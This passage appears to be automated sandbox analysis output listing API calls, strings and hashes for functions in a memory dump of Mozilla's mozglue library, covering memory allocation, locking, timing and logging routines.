                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpystrlen
                                                                  • String ID: (pre-xul)$data$name$schema
                                                                  • API String ID: 3412268980-999448898
                                                                  • Opcode ID: 39a1ed6859097ede83a8a33bf3c8580023af4075cd9f1b80cec4d7c4f59af366
                                                                  • Instruction ID: 8ba140954840e9fb40d1d312b1864f56e5ddc366562663f59341cdd8691c3dfb
                                                                  • Opcode Fuzzy Hash: 39a1ed6859097ede83a8a33bf3c8580023af4075cd9f1b80cec4d7c4f59af366
                                                                  • Instruction Fuzzy Hash: 28E17EB1B043508BC710CF68885066BFBE9BFA5314F148A2DE899E7790DB74DD498B92
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD4F2
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD50B
                                                                    • Part of subcall function 6C9BCFE0: EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9BCFF6
                                                                    • Part of subcall function 6C9BCFE0: LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9BD026
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD52E
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9DD690
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9DD6A6
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9DD712
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD751
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9DD7EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                  • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                  • API String ID: 2690322072-3894294050
                                                                  • Opcode ID: dd15f404ab8de171373b237b4379e6d6f80f184c2b1ed86786e66d2c60389f3a
                                                                  • Instruction ID: 046899b4d4557148854147cbca166b97b38e63b3515101d861da19fa3c5e8c8d
                                                                  • Opcode Fuzzy Hash: dd15f404ab8de171373b237b4379e6d6f80f184c2b1ed86786e66d2c60389f3a
                                                                  • Instruction Fuzzy Hash: 8F91C372A04B018FD718CF28C4A472AB7E5EB99714F16C92EE59AD7B80D730E845CF91
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
                                                                  • memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2
                                                                  • memset.VCRUNTIME140(6CA17765,000000E5,A3C09015), ref: 6C9D61F0
                                                                  • VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6C9D7652
                                                                  Strings
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9D72F8
                                                                  • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9D730D
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9D72E3
                                                                  • MOZ_CRASH(), xrefs: 6C9D7BA4
                                                                  • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9D7BCD, 6C9D7C1F, 6C9D7C34, 6C9D80FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 2613674957-1127040744
                                                                  • Opcode ID: d1f997c76515656aa92c3971342f8f02906cfbb4b214d12995ae86e3903aa061
                                                                  • Instruction ID: bc8a6237d97af90ccfc30c42272024b91ce07752a135ce3d7c6061f805813f45
                                                                  • Opcode Fuzzy Hash: d1f997c76515656aa92c3971342f8f02906cfbb4b214d12995ae86e3903aa061
                                                                  • Instruction Fuzzy Hash: E7336D71605B018FD308CF28C590615FBE6BF85328F2AC6ADE9699F7A9D731E841CB41
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B3492
                                                                  • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B34A9
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B34EF
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C9B350E
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9B3522
                                                                  • __aulldiv.LIBCMT ref: 6C9B3552
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B357C
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B3592
                                                                    • Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
                                                                    • Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                  • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                  • API String ID: 3634367004-706389432
                                                                  • Opcode ID: 6a70a03ea179501ab45b60dee5b8e947a0c8a92d490b3a0ac797e5acb4d1e427
                                                                  • Instruction ID: e1c38faf581e4e1a815d7fa0d006a1f6ba9e1f2439ba5d4702c6de8a17b09a1c
                                                                  • Opcode Fuzzy Hash: 6a70a03ea179501ab45b60dee5b8e947a0c8a92d490b3a0ac797e5acb4d1e427
                                                                  • Instruction Fuzzy Hash: 0D31A171B00346ABDF18DBB9DD68AAA77B9FB55304F108119E509E3690DB70D906CB60
                                                                  Strings
                                                                  • ProfileBuffer parse error: %s, xrefs: 6CA04DD9
                                                                  • data, xrefs: 6CA049B4
                                                                  • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*3, xrefs: 6CA04DB8, 6CA04DD8
                                                                  • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration, xrefs: 6CA04D0A
                                                                  • schema, xrefs: 6CA048C1
                                                                  • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*2, xrefs: 6CA04D65
                                                                  • -%llu, xrefs: 6CA04825
                                                                  • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime, xrefs: 6CA04CAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID: -%llu$ProfileBuffer parse error: %s$data$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*2$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*3$schema
                                                                  • API String ID: 1294909896-3225433307
                                                                  • Opcode ID: c583586b56e220491d79c11c04b2c6a9aeda12020b92d699968ff9e189f16ced
                                                                  • Instruction ID: 50436eab7f90055529343576ad67af2338d0d9b6696ee43dc7ca6bb6ed91d900
                                                                  • Opcode Fuzzy Hash: c583586b56e220491d79c11c04b2c6a9aeda12020b92d699968ff9e189f16ced
                                                                  • Instruction Fuzzy Hash: 5672E971A18B858BD321CF38C4513ABF7E5AFDA384F148B1DE4896B611EB70A4C5DB42
                                                                  APIs
                                                                  • Sleep.KERNEL32(000007D0), ref: 6CA14EFF
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA14F2E
                                                                  • moz_xmalloc.MOZGLUE ref: 6CA14F52
                                                                  • memset.VCRUNTIME140(00000000,00000000), ref: 6CA14F62
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA152B2
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA152E6
                                                                  • Sleep.KERNEL32(00000010), ref: 6CA15481
                                                                  • free.MOZGLUE(?), ref: 6CA15498
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                  • String ID: (
                                                                  • API String ID: 4104871533-3887548279
                                                                  • Opcode ID: 2323bbe17e0e9a21894aa0bc9e14a68e51a9d9856e85546728d2d521b40931cd
                                                                  • Instruction ID: 20944bc26409179fb03b61fc4b33036b69193b1ba918a6067d101961bf706238
                                                                  • Opcode Fuzzy Hash: 2323bbe17e0e9a21894aa0bc9e14a68e51a9d9856e85546728d2d521b40931cd
                                                                  • Instruction Fuzzy Hash: CCF1C271A18B018FC716CF39C86062BB7B5AFD6284F05872EF84AA7651DB31D446CB81
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E744), ref: 6C9C7885
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E744), ref: 6C9C78A5
                                                                  • EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9C78AD
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9C78CD
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9C78D4
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C9C78E9
                                                                  • EnterCriticalSection.KERNEL32(00000000), ref: 6C9C795D
                                                                  • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C9C79BB
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9C7BBC
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C9C7C82
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9C7CD2
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C9C7DAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavememset
                                                                  • String ID:
                                                                  • API String ID: 759993129-0
                                                                  • Opcode ID: e643f7db314dd2c595c26645cff264166977727456de04188dd64686d58932d9
                                                                  • Instruction ID: 2118ca8d420bcf0c41a5761ea0af93f2014a48d4926370f3d54c545d98015fd7
                                                                  • Opcode Fuzzy Hash: e643f7db314dd2c595c26645cff264166977727456de04188dd64686d58932d9
                                                                  • Instruction Fuzzy Hash: 30028F31A4121A8FDB54CF19C984799B7B5FF88318F2982AAD80DA7741D730EE91CF81
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 6CA16009
                                                                  • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CA16024
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C9BEE51,?), ref: 6CA16046
                                                                  • OutputDebugStringA.KERNEL32(?,6C9BEE51,?), ref: 6CA16061
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA16069
                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA16073
                                                                  • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA16082
                                                                  • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6CA3148E), ref: 6CA16091
                                                                  • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C9BEE51,00000000,?), ref: 6CA160BA
                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA160C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                  • String ID:
                                                                  • API String ID: 3835517998-0
                                                                  • Opcode ID: 19b84bc8164adb06510ae2921ef9042bfc5345667e80dc864e6e7e1759bc18a8
                                                                  • Instruction ID: 92cf21e619d1799f6b27819805d1b5580d4f01e636ec1495357675739a26ccc4
                                                                  • Opcode Fuzzy Hash: 19b84bc8164adb06510ae2921ef9042bfc5345667e80dc864e6e7e1759bc18a8
                                                                  • Instruction Fuzzy Hash: D021B1B1A003199FDB205F28DC09AAA7BB9FF45218F04C568E81ED7640DB34E959CFD1
                                                                  APIs
                                                                  • GetLastError.KERNEL32 ref: 6CA17046
                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6CA17060
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA1707E
                                                                    • Part of subcall function 6C9C81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9C81DE
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA17096
                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA1709C
                                                                  • LocalFree.KERNEL32(?), ref: 6CA170AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                  • String ID: ### ERROR: %s: %s$(null)
                                                                  • API String ID: 2989430195-1695379354
                                                                  • Opcode ID: 3c2eafce323b39229874bf8a61e430173946646d19ff137077a814815e7b2351
                                                                  • Instruction ID: 573ab15ba42bb15abb04788a9484eced8f80428a4e69f3c98d9f8497f8cbec37
                                                                  • Opcode Fuzzy Hash: 3c2eafce323b39229874bf8a61e430173946646d19ff137077a814815e7b2351
                                                                  • Instruction Fuzzy Hash: 46012DB1B00309AFDB149B68EC1ADAF7BBDEF49214F010135FA0DE3241D631A9048BA1
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C9D9EB8
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9D9F24
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9D9F34
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9DA823
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9DA83C
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9DA849
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                                                  • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 2950001534-1351931279
                                                                  • Opcode ID: 060255725f0ed9d8b9c362e90240df41eed3320d527f725feea9a487c8aa48fa
                                                                  • Instruction ID: 44beb404245ccb1212e4080a7df921c75a48c0685ca3fb1fcba3fc873394f8e6
                                                                  • Opcode Fuzzy Hash: 060255725f0ed9d8b9c362e90240df41eed3320d527f725feea9a487c8aa48fa
                                                                  • Instruction Fuzzy Hash: 86728F72A15B118FD304CF28C540215FBE5BF85328F2AC7ADE869AB791DB35E851CB81
                                                                  APIs
                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CA02C31
                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CA02C61
                                                                    • Part of subcall function 6C9B4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C9B4E5A
                                                                    • Part of subcall function 6C9B4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C9B4E97
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA02C82
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA02E2D
                                                                    • Part of subcall function 6C9C81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9C81DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                  • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                  • API String ID: 801438305-4149320968
                                                                  • Opcode ID: a6838177ce2c419ad1956519d190dceae4092dde2ae331d3e9a73ad79ef25e3c
                                                                  • Instruction ID: b8523f87424393c87a25cbe9952d757e2682e073bb638ba911a856f0d5f8b1ec
                                                                  • Opcode Fuzzy Hash: a6838177ce2c419ad1956519d190dceae4092dde2ae331d3e9a73ad79ef25e3c
                                                                  • Instruction Fuzzy Hash: ED91DF707087418FC724CF28D49469FB7E1AF8939CF148A2DE99A87791DB30D989CB52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0123456789abcdef$MOZ_CRASH()
                                                                  • API String ID: 0-3968268099
                                                                  • Opcode ID: 40907f7a0bc24e3d9cfafccfbac5372de737edf2a752a3f3ccc77ec82fcc0890
                                                                  • Instruction ID: e07a776c6cc1f773f198264f0bd6afade6982df1b5a97e650f61a9b2462f4f7b
                                                                  • Opcode Fuzzy Hash: 40907f7a0bc24e3d9cfafccfbac5372de737edf2a752a3f3ccc77ec82fcc0890
                                                                  • Instruction Fuzzy Hash: 8352F431608B418FD724CF18C46076AB7E6FB86318F15C91DE9DAA7B81C735E846CB92
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv__aullrem
                                                                  • String ID: -Infinity$NaN
                                                                  • API String ID: 3839614884-2141177498
                                                                  • Opcode ID: 9958ccfb55c0d8587cdfce39118ec998261a864dc4d301f31389958719656591
                                                                  • Instruction ID: 63e8591909c605fe1a2f53ae96cf41c381eda44e636fc56174dc0653bbe3869f
                                                                  • Opcode Fuzzy Hash: 9958ccfb55c0d8587cdfce39118ec998261a864dc4d301f31389958719656591
                                                                  • Instruction Fuzzy Hash: 92C1BF31E083199FDB14CFA9C85079EB7B6FF94314F184529D406ABB80D771AD89CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $-$0$0$1$8$9$@
                                                                  • API String ID: 0-3654031807
                                                                  • Opcode ID: b8d35072cba16821603818f482c9746fc4b0c3a8e5024b705f4395e37815f568
                                                                  • Instruction ID: 29b1b452447c093473232f1114b65940f551ed49e5ded151a73800565cc8a106
